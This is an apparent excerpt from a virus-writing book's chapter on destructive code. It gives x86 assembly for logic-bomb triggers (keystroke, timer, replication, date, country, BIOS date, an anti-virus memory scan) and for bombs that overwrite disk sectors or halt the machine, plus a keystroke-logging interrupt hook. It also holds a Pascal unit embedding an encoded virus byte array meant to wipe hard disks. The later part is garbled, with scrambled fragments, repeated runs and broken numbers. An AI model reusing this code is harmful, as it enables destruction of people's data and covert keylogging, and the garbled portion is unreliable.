these techniques work perfectly well, they are in principle just the same as using assembler—and assembler is more versatile. The reader who is interested in such matters would do well to consult some of the material available on The Collection CD-ROM. 1 On the face of it, writing destructive code is the simplest programming task in the world. When someone who doesn’t know the first thing about programming tries to program, the first thing they learn is that it’s easier to write a destructive program which louses something up than it is to write a properly working program. For example, if you know that Interrupt 13H is a call to the disk BIOS and it will write to the hard disk if you call it with ah=3 and dl=80H, you can write a simple destructive program, mov dl,80H mov ah,3 int 13H You needn’t know how to set up the other registers to do something right. Executing this will often overwrite a sector on the hard disk with garbage. Despite the apparent ease of writing destructive code, there is an art to it which one should not be unaware of. While the above routine is almost guaranteed to cause some damage when properly deployed, it would be highly unlikely to stop a nuclear attack even if it did find its way into the right computer. It might cause some damage, but probably not the right damage at the right time. To write effective destructive code, one must pay close atten- tion to (1) the trigger mechanism and (2) the bomb itself. Essen- tially, the trigger decides when destructive activity will take place and the bomb determines what destructive activity will happen. We will discuss each aspect of destructive code writing in this chapter. 1 Consult the Resources section in this book for more information. Trigger Mechanisms Triggers can cause the bomb to detonate under a wide variety of circumstances. If you can express any set of conditions logically and if a piece of software can sense these conditions, then they can be coded into a trigger mechanism. For example, a trigger routine could activate when the PC’s date reads June 13, 1996 if your computer has an Award BIOS and a SCSI hard disk, and you type the word “garbage”. On the other hand, it would be rather difficult to make it activate at sunrise on the next cloudy day, because that can’t be detected by software. This is not an entirely trivial obser- vation—chemical bombs with specialized hardware are not subject to such limitations. For the most part, logic bombs incorporated into computer viruses use fairly simple trigger routines. For example, they acti- vate on a certain date, after a certain number of executions, or after a certain time in memory, or at random. There is no reason this simplicity is necessary, though. Trigger routines can be very com- plex. In fact, the Virus Creation Lab allows the user to build much more complex triggers using a pull-down menu scheme. Typically, a trigger might simply be a routine which returns with the z flag set or reset. Such a trigger can be used something like this: LOGIC_BOMB: call TRIGGER ;detonate bomb? jnz DONT_DETONATE ;nope call BOMB ;yes DONT_DETONATE: Where this code is put may depend on the trigger itself. For example, if the trigger is set to detonate after a program has been in memory for a certain length of time, it would make sense to make it part of the software timer interrupt (INT 1CH). If it triggers on a certain set of keystrokes, it might go in the hardware keyboard interrupt (INT 9), or if it triggers when a certain BIOS is detected, it could be buried within the execution path of an application program. Let’s take a look at some of the basic tools a trigger routine can use to do its job: The Counter Trigger A trigger can occur when a counter reaches a certain value. Typically, the counter is just a memory location that is initialized to zero at some time, and then incremented in another routine: COUNTER DW 0 (Alternatively, it could be set to some fixed value and decremented to zero.) COUNTER can be used by the trigger routine like this: TRIGGER: cmp cs:[COUNTER],TRIG_VAL ret When [COUNTER]=TRIG_VAL, TRIGGER returns with z set and the BOMB gets called. Keystroke Counter The counter might be incremented in a variety of ways, depend- ing on the conditions for the trigger. For example, if the trigger should go off after 10,000 keystrokes, one might install an Interrupt 9 handler like this: INT_9: push ax in al,60H test al,80H pop ax jnz I9EX inc cs:[COUNTER] call TRIGGER jnz I9EX call BOMB I9EX: jmp DWORD PTR cs:[OLD_INT9] This increments COUNTER with every keystroke, ignoring the scan codes which the keyboard puts out when a key goes up, and the extended multiple scan codes produced by some keys. After the logic bomb is done, it passes control to the original int 9 handler to process the keystroke. Time Trigger On the other hand, triggering after a certain period of time can be accomplished with something as simple as this: INT_1C: inc cs:[COUNTER] call TRIGGER jnz I1CEX call BOMB I1CEX: jmp DWORD PTR cs:[OLD_INT1C] Since INT_1C gets called 18.9 times per second, [COUNTER] will reach the desired value after the appropriate time lapse. One could likewise code a counter-based trigger to go off after a fixed number of disk reads (Hook int 13H, Function 2), after executing so many programs (Hook Interrupt 21H, Function 4BH), or chang- ing video modes so many times (Hook int 10H, Function 0), or after loading Windows seven times (Hook int 2FH, Function 1605H), etc., etc. Replication Trigger One of the more popular triggers is to launch a bomb after a certain number of replications of a virus. There are a number of ways to do this. For example, the routine push [COUNTER] mov [COUNTER],0 ;reset counter call REPLICATE ;and replicate pop [COUNTER] ;restore original counter inc [COUNTER] ;increment it call TRIGGER will make TRIG_VAL copies of itself and then trigger. Each copy will have a fresh counter set to zero. The Lehigh virus, which was one of the first viruses to receive a lot of publicity in the late 80’s, used this kind of a mechanism. One could, of course, code this replication trigger a little differently to get different results. For example, call TRIGGER jnz GOON ;increment counter if no trigger call BOMB ;else explode mov [COUNTER],0 ;start over after damage GOON: inc [COUNTER] ;increment counter call REPLICATE ;make new copy w/ new counter dec [COUNTER] ;restore original value will count the generations of a virus. The first TRIG_VAL-1 generations will never cause damage, but the TRIG_VAL’th gen- eration will activate the BOMB. Likewise, one could create a finite number of bomb detonations with the routine inc [COUNTER] ;increment counter call TRIGGER jnz GO_REP ;repliate if not triggered call BOMB ;else explode jmp $ ;and halt—do not replicate! GO_REP: call REPLICATE The first generation will make TRIG_VAL copies of itself and then trigger. One of the TRIG_VAL second-generation copies will make TRIG_VAL-1 copies of itself (because it starts out with COUNTER = 1) and then detonate. This arrangement gives a total of 2 TRIG_VAL bombs exploding. This is a nice way to handle a virus dedicated to attacking a specific target because it doesn’t just keep replicating and causing damage potentially ad infinitum. It just does its job and goes away. The System-Parameter Trigger There are a wide variety of system parameters which can be read by software and used in a trigger routine. By far the most common among virus writers is the system date, but this barely scratches the surface of what can be done. Let’s look at some easily accessible system paramters to get a feel for the possibilities . . . . Date To get the current date, simply call int 21H with ah=2AH. On return, cx is the year, dh is the month, and dl is the day of the month, while al is the day of the week, 0 to 6. Thus, to trigger on any Friday the 13th, a trigger might look like this: TRIGGER: mov ah,2AH int 21H ;get date info cmp al,5 ;check day of week jnz TEX cmp dl,13 ;check day of month TEX: ret Pretty easy! No wonder so many viruses use this trigger. Time DOS function 2CH reports the current system time. Typically a virus will trigger after a certain time, or during a certain range of time. For example, to trigger between four and five PM, the trigger could look like this: TRIGGER: mov ah,2CH int 21H cmp ch,4+12 ;check hour ret ;return z if 4:XX pm Disk Free Space DOS function 36H reports the amount of free space on a disk. A trigger could only activate when a disk is 127 ⁄ 128 or more full, for example: TRIGGER: mov ah,36H mov dl,3 int 21H mov ax,dx ;dx=total clusters on disk sub ax,bx ;ax=total free clusters mov cl,7 shr dx,cl ;dx=dx/128 cmp ax,dx ;if free<al/128 then trigger jg NOTR xor al,al NOTR: ret Country One could write a virus to trigger only when it finds a certain country code in effect on a computer by using DOS function 38H. The country codes used by DOS are the same as those used by the phone company for country access codes. Thus, one could cause a virus to trigger only in Germany and nowhere else: TRIGGER: mov ah,38H mov al,0 ;get country info mov dx,OFFSET BUF ;buffer for country info int 21H cmp bx,49 ;is it Germany? ret This trigger and a date trigger (December 7) are used by the Pearl Harbor virus distributed with the Virus Creation Lab. It only gets nasty in Japan. Video Mode By using the BIOS video services, a virus could trigger only when the video is in a certain desired mode, or a certain range of modes: TRIGGER: mov ah,0FH int 10H ;get video mode and al,11111100B ;mode 0 to 3? ret This might be useful if the bomb includes a mode-dependent graphic, such as the Ambulance virus, which sends an ambulance across your screen from time to time, and which requires a normal text mode. Many other triggers which utilize interrupt calls to fetch system information are possible. For example, one could trigger depending on the number and type of disk drives, on the memory size or free memory, on the DOS version number, on the number of serial ports, on whether a network was installed, or whether DPMI or Windows was active, and on and on. Yet one need not rely only on interrupt service routines to gather information and make decisions. BIOS ROM Version A logic bomb could trigger when it finds a particular BIOS (or when it does not find a particular BIOS). To identify a BIOS, a 16-byte signature from the ROM, located starting at F000:0000 in memory is usually sufficient. The BIOS date stamp at F000:FFF5 might also prove useful. The routine TRIGGER: push es mov ax,0F000H ;BIOS date at es:di mov es,ax mov di,0FFF5H mov si,OFFSET TRIG_DATE ;date to compare with mov cx,8 repz cmpsb pop es jz TNZ ;same, don’t trigger xor al,al ;else set Z ret TNZ: mov al,1 or al,al ret TRIG_DATE DB ’12/12/91’ triggers if the BIOS date is anything but 12/12/91. Such a trigger might be useful in a virus that is benign on your own computer, but malicious on anyone else’s. Keyboard Status The byte at 0000:0417H contains the keyboard status. If bits 4 through 7 are set, then Scroll Lock, Num Lock, Caps Lock and Insert are active, respectively. A trigger might only activate when Num Lock is on, etc., by checking this bit. Anti-Virus Search Obviously there are plenty of other memory variables which might be used to trigger a logic bomb. A virus might even search memory for an already-installed copy of itself, or a popular anti- virus program and trigger if it’s installed. For example, the follow- ing routine scans memory for the binary strings at SCAN_STRINGS, and activates when any one of them is found: SCAN_RAM: push es mov si,OFFSET SCAN_STRINGS SRLP: lodsb ;get scan string length or al,al ;is it 0? jz SREXNZ ;yes-no match, end of scan strings xor ah,ah push ax ;save string length lodsw mov dx,ax ;put string offset in dx (loads di) pop ax mov bx,40H ;start scan at seg 40H (bx loads es) push si SRLP2: pop si ;inner loop, look for string in seg push si ;set up si mov di,dx ;and di mov cx,ax ;scan string size inc bx ;increment segment to scan mov es,bx ;set segment push ax ;save string size temporarily SRLP3: lodsb ;get a byte from string below xor al,0AAH ;xor to get true value to compare inc di cmp al,es:[di-1] ;compare against byte in ram loopz SRLP3 ;loop ’till done or no compare pop ax jz SREX1 ;have a match-string found! return Z cmp bx,0F000H ;done with this string’s scan? jnz SRLP2 ;nope, go do another segment pop si ;scan done, clean stack add si,ax jmp SRLP ;and go for next string SREX1: xor al,al ;match found - set z and exit pop si pop es ret SREXNZ: pop es inc al ;return with nz - no matches ret ;The scan string data structure looks like this: ; DB LENGTH = A single byte string length ; DW OFFSET = Offset where string is located in seg ; DB X,X,X = Scan string of length LENGTH, ; xored with 0AAH ; ;These are used back to back, and when a string of length 0 is ;encountered, SCAN_RAM stops. The scan string is XORed with AA so ;this will never detect itself. SCAN_STRINGS: DB 14 ;length DW 1082H ;offset DB 0E9H,0F9H,0EBH,0FCH,84H,0EFH ;scan string DB 0F2H,0EFH,0AAH,0AAH,85H,0FCH,0F9H,0AAH ;for MS-DOS 6.20 VSAFE ;Note this is just a name used by VSAFE, not the best string DB 0 ;next record, 0 = no more strings An alternative might be to scan video memory for the display of a certain word or phrase. Finally, one might write a trigger which directly tests hardware to determine when to activate. Processor Check Because 8088 processors handle the instruction push sp differ- ently from 80286 and higher processors, one can use it to determine which processor a program is run on. The routine TRIGGER: push sp pop bx mov ax,sp cmp ax,bx ret triggers (returns with z set) only if the processor is an 80286 or above. Null Trigger Finally, we come to the null trigger, which is really no trigger at all. Simply put, the mere placement of a logic bomb can serve as trigger enough. For example, one might completely replace DOS’s critical error handler, int 24H, with a logic bomb. The next time that handler gets called (for example, when you try to write to a write-protected diskette) the logic bomb will be called. In such cases there is really no trigger at all—just the code equivalent of a land mine waiting for the processor to come along and step on it. Logic Bombs Next, we must discuss the logic bombs themselves. What can malevolent programs do when they trigger? The possibilities are at least as endless as the ways in which they can trigger. Here we will discuss some possibilities to give you an idea of what can be done. Brute Force Attack The simplest logic bombs carry out some obvious annoying or destructive activity on a computer. This can range from making noise or goofing with the display to formatting the hard disk. Here are some simple examples: Halt the Machine This is the easiest thing a logic bomb can possibly do: BOMB jmp $ will work quite fine. You might stop hardware interrupts too, to force the user to press the reset button: BOMB: cli jmp $ [...]... 133 ,93 , 89, 131,167,67,43, 29, 191 ,1 39, 27,246,21,246,148,130,130,172,137, 60,53,238,216,1 59, 208,84, 39, 130,25,153, 59, 0, 195 ,230,37,52,205,81,32,120, 220,148,245,2 39, 2,6, 59, 145,20,237,14,1 49, 146,252,133,18,5,206,227,250, 193 ,45,1 29, 137,84,1 59, 1 59, 166, 69, 161,242,81, 190 ,54,185, 196 ,58,151, 49, 116,131, 19, 166,16,251,188,125,116,2 39, 126, 69, 113,5,3,171,73,52,114,252, 172,226,23,133,180, 69, 190 , 59, 148,152,246,44 ,9, 2 49, 251, 196 ,85, 39, 154,184,... 19, 113,64,231,232,104,187,38,27,168,162,1 19, 230, 190 ,61,252 ,90 ,54,10,167, 140 ,97 ,228,223, 193 ,123,242,1 89, 7 ,91 ,126, 191 ,81,255,185,233,170,2 39, 35, 24,72,123, 193 ,210,73,167,2 39, 43,13,108,1 19, 112,16,2,234,54,1 69, 13,247, 214,1 59, 11,137,32,236,233,244,75,166,232, 195 ,101,254,72,20,100,241,247, 154,86,84, 192 ,46,72,52,124,156, 79, 125,14,250,65,250,34,233,20, 190 ,145, 135,186, 199 ,241,53,215, 197 ,2 09, 117,4,137,36,8,203,14,104,83,174,153,208, 91 ,2 09, 174,232,1 19, 231,113,241,101,56,222,207,24,242,40,236,6,183,206,... the proper values before compiling this TPU} const VIRSIZE =654; {Size of virus to be released} VIRUS :array[0 VIRSIZE-1] of byte=(121,74,2 09, 113,228,217,200, 48,127,1 69, 231,22,127,114, 19, 2 49, 164,1 49, 27, 2,22,86,1 09, 173,142,151,117,252,138, 194 ,241,173,131,2 19, 236,123,107,2 19, 44,184,231,188,56,212,0,241,70,135,82, 39, 191 , 197 ,228,132, 39, 184,52,206, 136,74,47,31, 190 ,20,8,38,67, 190 ,55,1,77, 59, 59, 120, 59, 16,212,148,200,185,... 91 ,2 09, 174,232,1 19, 231,113,241,101,56,222,207,24,242,40,236,6,183,206, 44,152,14,36,34,83, 199 ,140,1,156,73, 197 ,84, 195 ,151,253,1 69, 73,81,246, 158,243,22,46,245,85,157,110,108,164,110,240,135,167,237,124,83,173,173, 146, 196 ,201,106,37,71,1 29, 151,63,137,166,6, 89, 80,240,140,88,160,138,11, 116,117,1 59, 245,1 29, 102, 199 ,0,86,127,1 09, 231,233,6,125,162,135,54,104, 158,151,28,10,245,45,110,150,187,37,1 89, 120,76,151,155, 39, 99, 43,254,103,... 136,74,47,31, 190 ,20,8,38,67, 190 ,55,1,77, 59, 59, 120, 59, 16,212,148,200,185, 198 ,87,68,224,65,188,71,130,167, 197 ,2 09, 228,1 69, 42,130,208,70,62,15,172, 115,12 ,98 ,116,214,146,1 09, 176,55,30,8,60,245,148, 49, 45,108,1 49, 136,86, Destructive Code 555 193 ,14,82,5,121,126, 192 ,1 29, 247,180,201,126,187,33,163,204, 29, 156,24, 14,254,167,147,1 89, 184,174,182,212,141,102,33,244,61,167,208,155,167, 236,173,211,150,34,220,218,217 ,93 ,170,65 ,99 ,115,235,0,247,72,227,123, 19, 113,64,231,232,104,187,38,27,168,162,1 19, 230, 190 ,61,252 ,90 ,54,10,167,... generator and a counter Just increment the counter for every failure and make the key fail by getting a random number when the key is pressed Drop the keystroke whenever the random number is less than the counter 552 The Giant Black Book of Computer Viruses Stealth Attack So far, the types of attacks we have discussed become apparent to the user fairly quickly Once the attack has taken place his response... if he confesses.) 554 The Giant Black Book of Computer Viruses Example Now let’s take some of these ideas and put together a useful bomb and trigger This will be a double-acting bomb which can be incorporated into an application program written in Pascal At the first level, it checks the system BIOS to see if it has the proper date If it does not, Trigger 1 goes off, the effect of which is to release... 172,226,23,133,180, 69, 190 , 59, 148,152,246,44 ,9, 2 49, 251, 196 ,85, 39, 154,184, 74,141 ,91 ,156, 79, 121,140,232,172,22,130,253,253,154,120,211,102,183,145, 113,52,246,1 89, 138,12, 199 ,233,67,57,57,31,74,123 ,94 ,1,25,74,188,30,73, 83,225,24,23,202,111,2 09, 77, 29, 17,234,188,171,187,138, 195 ,16,74,142,185, 111,155,246,10,222 ,90 ,67,166,65,103,151,65,147,84,83,241,181,231,38,11, 237,210,112,176, 194 ,86,75,46,208,160 ,98 ,146,171,122,236,252,220,72, 196 , 218, 196 ,215,118,238,37 ,97 ,245,147,150,141 ,90 ,115,104 ,90 ,158,253,80,176,... in the application program The virus itself contains a trigger which includes a finite counter bomb with 6 generations When the second trigger goes off (in the virus), the virus’ logic bomb writes code to the IO.SYS file, which in turn wipes out the hard disk So if the government seizes your computer and tries the application program on another machine, they’ll be sorry Don’t the Inslaw people wish they... keystrokes, one can simply hook Interrupt 9 and call the original handler first, then grab the keystroke it just put in the buffer at 0:41CH out of the buffer after the original handler returns control to the interrupt hook These keystrokes can then be logged to the data transfer buffer, or wherever else you like A complete Interrupt 9 hook looks like this: INT _9: I91: push in push pushf call pop and jnz . 146, 196 ,201,106,37,71,1 29, 151,63,137,166,6, 89, 80,240,140,88,160,138,11, 116,117,1 59, 245,1 29, 102, 199 ,0,86,127,1 09, 231,233,6,125,162,135,54,104, 158,151,28,10,245,45,110,150,187,37,1 89, 120,76,151,155, 39, 99, 43,254,103, 133 ,93 , 89, 131,167,67,43, 29, 191 ,1 39, 27,246,21,246,148,130,130,172,137, . 60,53,238,216,1 59, 208,84, 39, 130,25,153, 59, 0, 195 ,230,37,52,205,81,32,120, 220,148,245,2 39, 2,6, 59, 145,20,237,14,1 49, 146,252,133,18,5,206,227,250, 193 ,45,1 29, 137,84,1 59, 1 59, 166, 69, 161,242,81, 190 ,54,185, 196 ,58,151, 49, . 2,22,86,1 09, 173,142,151,117,252,138, 194 ,241,173,131,2 19, 236,123,107,2 19, 44,184,231,188,56,212,0,241,70,135,82, 39, 191 , 197 ,228,132, 39, 184,52,206, 136,74,47,31, 190 ,20,8,38,67, 190 ,55,1,77, 59, 59, 120, 59, 16,212,148,200,185, 198 ,87,68,224,65,188,71,130,167, 197 ,2 09, 228,1 69, 42,130,208,70,62,15,172,